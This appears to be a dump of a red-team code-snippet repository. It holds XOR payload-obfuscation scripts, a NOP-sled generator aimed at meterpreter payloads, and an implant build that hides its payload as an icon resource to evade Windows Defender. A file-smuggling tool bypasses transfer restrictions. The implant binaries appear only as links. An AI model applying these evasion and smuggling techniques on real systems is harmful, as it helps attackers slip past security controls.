https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.exe
--------------------------------------------------------------------------------
/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.obj
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/Readme.md:
--------------------------------------------------------------------------------
1 | My custom implementation of Sektor7's RED TEAM Operator: Malware Development Essentials Course
2 |
3 | This code hides the payload in the resource section of my PE file, and uses some simple obfuscation and emulation detection to
4 | bypass the most up-to-date Windows Defender definitions.
5 |
6 | More on bypassing Windows Defender Emulations here:
7 |
8 | https://github.com/0xAlexei/Publications/blob/master/Reverse%20Engineering%20Windows%20Defender/Windows%20Binary%20Emulator/BHUSA%20-%20DEFCON%20-%20Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Revision-3.pdf
9 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM rc compiles resources.rc into resources.res; cvtres converts that into an x64 COFF
REM object (resources.o) which the link step embeds in implant.exe.
rc resources.rc
cvtres /MACHINE:x64 /OUT:resources.o resources.res
REM /Tcimplant.cpp compiles implant.cpp as C. /SUBSYSTEM:WINDOWS selects the GUI
REM subsystem, so the program starts without a console window.
REM /W0 turns all warnings off and /GS- disables the buffer security check (stack cookies).
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/favicon.ico
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/implant.exe
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/implant.obj
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/msgbox64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/msgbox64.bin
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/resources.h:
--------------------------------------------------------------------------------
1 | #define FAVICON_ICO 100
2 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/resources.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/resources.o
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 |
// Stores favicon.ico as an RCDATA (raw bytes) resource with ID FAVICON_ICO (100 in
// resources.h). The Readme for this directory says the payload is hidden in the resource
// section, and xorencrypt.py here writes its output to favicon.ico, so the resource is
// XORed data under an icon filename rather than an image.
FAVICON_ICO RCDATA favicon.ico
4 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/resources.res
--------------------------------------------------------------------------------
/Cpp/rsrc_injection/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "mysecretkeee"
9 |
def xor(data, key):
    """Return `data` XORed with `key`, repeating the key as often as needed.

    `key` goes through str() first. Every element of `data` is passed to ord(), so
    the input has to be a sequence of one-character strings. The result is a str.

    Repeating-key XOR with a key kept in this file (KEY) only disguises the bytes;
    it offers no confidentiality against someone who has the script or the loader.
    """
    key = str(key)
    span = len(key)

    def _mix(pos):
        # Key character is selected before the data element is converted.
        key_ch = key[pos % span]
        return chr(ord(data[pos]) ^ ord(key_ch))

    return "".join(_mix(pos) for pos in range(len(data)))
22 |
def printCiphertext(ciphertext):
    """Write `ciphertext` to stdout as `{ 0x.., 0x.. };` using unpadded hex values.

    Not referenced by the script body in this file, which prints the same text inline.
    """
    joined = ', 0x'.join(hex(ord(ch))[2:] for ch in ciphertext)
    print('{ 0x' + joined + ' };')
25 |
26 |
27 |
# Script body: load the input file, XOR it with KEY, save the result as favicon.ico
# and echo it as a hex list.
# Any exception during open/read is reported as a missing file argument (bare except).
try:
    with open(sys.argv[1], "rb") as src:
        plaintext = src.read()
except:
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()

ciphertext = xor(plaintext, KEY)

# favicon.ico is the file resources.rc embeds as RCDATA; after this step it contains
# XORed data, so it will not validate as an icon.
with open("favicon.ico", 'wb') as dst:
    dst.write(ciphertext)
printCiphertext(ciphertext)
38 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Resource pipeline: resources.rc -> resources.res (rc) -> resources.o (cvtres, x64),
REM then linked into implant.exe.
rc resources.rc
cvtres /MACHINE:x64 /OUT:resources.o resources.res
REM implant.cpp is compiled as C (/Tc) with no optimization (/Od) and a static CRT (/MT);
REM /SUBSYSTEM:WINDOWS means no console window at start.
REM Warnings are fully disabled (/W0) and stack buffer security checks are off (/GS-).
cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/favicon.ico
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant.exe
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant.obj
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/implant_noemul.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant_noemul.exe
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/resources.h:
--------------------------------------------------------------------------------
1 | #define FAVICON_ICO 100
2 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/resources.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/resources.o
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 |
// Adds favicon.ico to the binary as raw data (RCDATA), ID FAVICON_ICO = 100 per resources.h.
// xorencrypt.py in this directory overwrites favicon.ico with XORed bytes, so the name
// describes an icon while the content is not one.
FAVICON_ICO RCDATA favicon.ico
4 |
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/resources.res
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/reverse_shell/compile.bat:
--------------------------------------------------------------------------------
@ECHO OFF

REM Compiles reverse_shell.cpp as C (/Tc) into a console x64 executable, reverse_shell.exe.
REM /Od: no optimization. /MT: static CRT. /MP: parallel compilation. /DNDEBUG: defines NDEBUG.
REM /W0 silences every warning; /GS- removes the stack buffer security check.
cl.exe /nologo /Od /MT /W0 /GS- /MP /DNDEBUG /Tcreverse_shell.cpp /link /OUT:reverse_shell.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.exe
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.obj
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/reverse_shell/shell.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/shell.bin
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/shell.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/shell.bin
--------------------------------------------------------------------------------
/Cpp/rsrc_injection_shell/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "mysecretkeee"
9 |
def xor(data, key):
    """Combine `data` with a cyclic `key` using XOR and return the result as a str.

    The key is normalised with str(); each element of `data` is converted with ord(),
    which requires one-character strings. Applying the function twice with the same
    key returns the original text, so the output is only as private as the key, and
    the key is the KEY constant stored in this script.
    """
    key = str(key)
    key_size = len(key)
    out = []
    pos = 0

    for ch in data:
        key_ch = key[pos % key_size]
        out.append(chr(ord(ch) ^ ord(key_ch)))
        pos += 1

    return "".join(out)
22 |
def printCiphertext(ciphertext):
    """Print the elements of `ciphertext` as unpadded hex values inside `{ ... };`."""
    parts = []
    for ch in ciphertext:
        parts.append(hex(ord(ch))[2:])
    print('{ 0x' + ', 0x'.join(parts) + ' };')
25 |
26 |
27 |
# Script body: read argv[1] in binary mode, XOR it with KEY, store the output in
# favicon.ico and print it as a hex list.
# The bare except hides the real cause of a failed open/read behind the usage text.
try:
    with open(sys.argv[1], "rb") as src:
        plaintext = src.read()
except:
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()

ciphertext = xor(plaintext, KEY)

# The written file keeps the .ico name used by resources.rc but holds XORed data.
with open("favicon.ico", 'wb') as dst:
    dst.write(ciphertext)
printCiphertext(ciphertext)
38 |
--------------------------------------------------------------------------------
/Powershell/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Presentations/.placeholder:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Presentations/Building Skynet_as_submitted.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Presentations/Building Skynet_as_submitted.pptx
--------------------------------------------------------------------------------
/Python/PushingP/pushingpayloads.py:
--------------------------------------------------------------------------------
1 | import sys
2 | # by 0xTriboulet
3 | # Short python script that takes a raw binary payload
4 | # and build a (big) nop sled over that payload
5 | # put this large payload into your program and compile with:
6 | # /STACK:3000000
# Reads the file named by argv[1] and prints one C array declaration in which the
# file's bytes follow 2,048,000 entries of 0x90.
# The array is therefore over 2 MB before the input even starts; a long uniform run
# of 0x90 is a simple static indicator in the resulting source or binary.
try:
    with open(sys.argv[1], "rb") as src:
        plaintext = src.read()
except:
    # Bare except: every open/read failure produces the same usage text.
    print("File argument needed! %s " % sys.argv[0])
    print("python2 pushingpayloads.py meterpreter_stageless.bin > out.txt")
    sys.exit()

sled_text = '0x90, ' * 2048000
body_text = ', 0x'.join(hex(ord(x))[2:] for x in plaintext)
print('unsigned char payload[] = { ' + sled_text + '0x' + body_text + ' };')
--------------------------------------------------------------------------------
/Python/PushingP/pushingpayloadsv3.py:
--------------------------------------------------------------------------------
1 | import sys
2 | # by 0xTriboulet
3 | # Short python script that takes a raw binary payload
4 | # and build a (big) nop sled over that payload
5 | # put this large payload into your program and compile with:
6 | # /STACK:3000000
7 | # PYTHON3
# Reads the file named by argv[1] and prints one line starting with a C array
# declaration: 2,048,000 entries of 0x90 followed by the file's bytes rendered with hex().
# The leading run alone makes the output over 2 MB and is a uniform, easily matched pattern.
try:
    with open(sys.argv[1], "rb") as src:
        plaintext = src.read()
except:
    # Bare except: every open/read failure produces the same usage text.
    print("File argument needed! %s " % sys.argv[0])
    print("python3 pushingpayloadsv3.py meterpreter_stageless.bin > out.txt")
    sys.exit()

sled_text = '0x90, ' * 2048000
body_text = ', '.join(str(hex(x)) for x in plaintext)
print('unsigned char payload[] = { ' + sled_text + '0x' + body_text + ' };')
--------------------------------------------------------------------------------
/Python/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Python/smuggler/OUT/test.txt:
--------------------------------------------------------------------------------
1 | TEST
2 |
--------------------------------------------------------------------------------
/Python/smuggler/Readme.md:
--------------------------------------------------------------------------------
1 | Short Python script that converts any file into a base64-encoded zip file stored in out.txt. You can then copy the script and the contents of out.txt into a .py file and an in.txt file (respectively) on the target environment and run the script again. This methodology allows you to transfer executables into environments that otherwise do not allow file transfers.
2 |
3 |
4 | [12/4/2022] Added the -x option, which lets you XOR your smuggled files
5 |
6 | 
7 |
8 |
9 | XORing remains optional though
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/Python/smuggler/in.txt:
--------------------------------------------------------------------------------
1 | UEsDBBQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAdGVzdC50eHRURVNUClBLAQIUAxQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAAAAAAAAAAAC0gQAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAAArAAAAAAA=
--------------------------------------------------------------------------------
/Python/smuggler/out.txt:
--------------------------------------------------------------------------------
1 | UEsDBBQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAdGVzdC50eHRURVNUClBLAQIUAxQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAAAAAAAAAAAC0gQAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAAArAAAAAAA=
--------------------------------------------------------------------------------
/Python/smuggler/test.txt:
--------------------------------------------------------------------------------
1 | TEST
2 |
--------------------------------------------------------------------------------
/Python/utilities/Readme.md:
--------------------------------------------------------------------------------
1 | A collection of useful python scripts. Some of these have been modified from their original versions, but credit is given as much as possible to the original authors.
2 |
3 |
--------------------------------------------------------------------------------
/Python/utilities/beautify.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
# Reads the file named by argv[1], writes an unchanged copy to payload.out and prints
# the bytes as a C `unsigned char payload[]` initializer with unpadded hex values.
try:
    with open(sys.argv[1], "rb") as src:
        plaintext = src.read()
except:
    # Bare except: any open/read failure is reported as a missing file argument.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()

with open("payload.out", 'wb') as dst:
    dst.write(plaintext)

hex_list = ', 0x'.join(hex(ord(x))[2:] for x in plaintext)
print('unsigned char payload[] = { 0x' + hex_list + ' };')
--------------------------------------------------------------------------------
/Python/utilities/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "WindowsSystem32"
9 |
def xor(data, key):
    """XOR `data` against `key`, cycling through the key, and return a str.

    str() is applied to `key`; ord() is applied to each element of `data`, so the
    elements must be one-character strings.

    The transform is its own inverse and the key is the readable KEY constant in this
    file, so the output should be treated as obfuscated, not encrypted.
    """
    key = str(key)
    n = len(key)

    # Pair every data element with its key character first, then combine the pairs.
    pairs = [(data[i], key[i % n]) for i in range(len(data))]
    return "".join([chr(ord(ch) ^ ord(key_ch)) for ch, key_ch in pairs])
22 |
def printCiphertext(ciphertext):
    """Print `ciphertext` as `{ 0x.., 0x.. };` with one unpadded hex value per element.

    The script body in this file prints a similar line itself (with an array
    declaration in front) and does not call this helper.
    """
    rendered = map(lambda ch: hex(ord(ch))[2:], ciphertext)
    print('{ 0x' + ', 0x'.join(rendered) + ' };')
25 |
26 |
27 |
# Script body: read argv[1] in binary mode, XOR it with KEY and print the result as a
# C `unsigned char payload[]` initializer. Nothing is written to disk here; the write
# to payload.out is commented out.
try:
    with open(sys.argv[1], "rb") as src:
        plaintext = src.read()
except:
    # Bare except: any open/read failure is reported as a missing file argument.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()

ciphertext = xor(plaintext, KEY)
#open("payload.out",'wb').write(ciphertext)
hex_list = ', 0x'.join(hex(ord(x))[2:] for x in ciphertext)
print('unsigned char payload[] = { 0x' + hex_list + ' };')
38 |
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | A disorganized repository of code snippets that I have found useful in getting the hang of new languages in the context of Red Team operations.
2 |
3 | Some of this code will be referenced in other products and is retained here for ease of access.
4 |
--------------------------------------------------------------------------------
/Rust/CreateProcessA/Cargo.toml:
--------------------------------------------------------------------------------
# NOTE(review): this package name is the one used in Rust/peruns_fart/Cargo.toml, although
# this manifest sits in Rust/CreateProcessA — presumably copied; confirm the intended name.
[package]
name = "peruns_fart"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
# NOTE(review): confirm the code really uses `sys`. A 0.0.0 release is often only a name
# placeholder, and every listed crate is downloaded and compiled on the build host whether
# or not anything imports it.
sys = "0.0.0"
# NOTE(review): winapi, windows and windows-sys are three separate Windows API bindings;
# verify that all three are needed, since each one widens the dependency tree.
winapi = {version = "0.3.9", features=[
"winnt",
"memoryapi",
"errhandlingapi",
"processthreadsapi",
"synchapi",
"winbase",
"handleapi",
"libloaderapi",
"minwinbase",
"heapapi"
]}
# NOTE(review): "*" accepts any published version of `windows` and `windows-sys`, so the
# manifest alone does not determine what gets built and a new upstream release is picked
# up without review. Prefer an explicit version requirement plus a committed Cargo.lock.
windows = { version = "*", features = [
"Win32_System_Threading",
"Win32_Foundation",
"Win32_System_Memory",
"Win32_Security"
] }
windows-sys = { version = "*", features = [
"Win32_System_Threading",
"Win32_Foundation",
"Win32_System_Memory"
] }
33 |
34 |
35 |
--------------------------------------------------------------------------------
/Rust/CreateProcessA/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/peruns_fart/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "peruns_fart"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
# "0.2.139" is a caret requirement (any compatible 0.2.x at or above it), so the version
# actually built is fixed only by Cargo.lock.
libc = "0.2.139"
# NOTE(review): confirm `sys` is used by the code; a 0.0.0 release is often only a name
# placeholder, and it is still fetched and compiled on the build host.
sys = "0.0.0"


# NOTE(review): the "*" requirement lets any published windows-sys version satisfy this
# dependency; give an explicit version and commit Cargo.lock so builds are repeatable.
windows-sys = { version = "*", features = [
"Win32_Security",
"Win32_Foundation",
"Win32_System_Kernel",
"Win32_System_Memory",
"Win32_System_Threading",
"Win32_System_LibraryLoader",
"Win32_System_SystemServices",
"Win32_System_SystemInformation",
"Win32_System_Diagnostics_Debug",
"Win32_System_WindowsProgramming",


] }
27 |
28 |
29 |
--------------------------------------------------------------------------------
/Rust/peruns_fart/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/rust_implantv1/implant_rust.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv1/implant_rust.exe
--------------------------------------------------------------------------------
/Rust/rust_implantv2/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "rusty_implant"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
# Both requirements name a version, but Cargo treats a bare version as a caret range
# (compatible updates allowed); the exact versions built come from Cargo.lock, so that
# file should be committed alongside this manifest.
libc = "0.2.139"
region = "3.0.0"
11 |
--------------------------------------------------------------------------------
/Rust/rust_implantv2/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/rust_implantv2/rusty_implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv2/rusty_implant.exe
--------------------------------------------------------------------------------
/Rust/rust_implantv3/Cargo.toml:
--------------------------------------------------------------------------------
# NOTE(review): the package is named rusty_implantv2 while the directory is rust_implantv3
# and the shipped binary is rusty_implantv3.exe — confirm which name is intended.
[package]
name = "rusty_implantv2"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
libc = "0.2.139"
# NOTE(review): verify that `sys` is actually imported; a 0.0.0 release is often only a
# name placeholder and is still downloaded and built.
sys = "0.0.0"


# NOTE(review): version "*" leaves windows-sys unpinned; any new release is accepted
# without review unless Cargo.lock is committed. An explicit version is safer.
windows-sys = { version = "*", features = [
"Win32_Security",
"Win32_Foundation",
"Win32_System_Kernel",
"Win32_System_Memory",
"Win32_System_Threading",
"Win32_System_LibraryLoader",
"Win32_System_SystemServices",
"Win32_System_SystemInformation",
"Win32_System_Diagnostics_Debug",
"Win32_System_WindowsProgramming",


] }
27 |
--------------------------------------------------------------------------------
/Rust/rust_implantv3/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/rust_implantv3/rusty_implantv3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv3/rusty_implantv3.exe
--------------------------------------------------------------------------------
/Rust/rust_implantv4/Cargo.toml:
--------------------------------------------------------------------------------
# NOTE(review): the package is named rusty_implantv2 while the directory is rust_implantv4
# and the shipped binary is rusty_implantv4.exe — confirm which name is intended.
[package]
name = "rusty_implantv2"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
libc = "0.2.139"
# NOTE(review): check whether `sys` is needed at all; unused entries still enlarge what
# is fetched and compiled at build time.
sys = "0.0.0"


# NOTE(review): "*" is an open-ended version requirement for windows-sys; replace it with
# an explicit version and keep Cargo.lock under version control.
windows-sys = { version = "*", features = [
"Win32_Security",
"Win32_Foundation",
"Win32_System_Kernel",
"Win32_System_Memory",
"Win32_System_Threading",
"Win32_System_LibraryLoader",
"Win32_System_SystemServices",
"Win32_System_SystemInformation",
"Win32_System_Diagnostics_Debug",
"Win32_System_WindowsProgramming",


] }
27 |
--------------------------------------------------------------------------------
/Rust/rust_implantv4/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Rust/rust_implantv4/rusty_implantv4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv4/rusty_implantv4.exe
--------------------------------------------------------------------------------
/Rust/rusty_calc/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "rusty_calc"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

# Release builds are compiled with optimization turned off (opt-level 0).
[profile.release]
opt-level = 0



[dependencies]
# All three dependencies name a version. These are caret requirements, so compatible
# updates are still allowed; Cargo.lock is what fixes the exact versions built.
errno = "0.2.8"
libc = "0.2.139"
windows-sys = {version = "0.42.0", features=["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading",
"Win32_Security", "Win32_System_Diagnostics_Debug","Win32_System_LibraryLoader"]}
18 |
--------------------------------------------------------------------------------
/Rust/rusty_calc/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------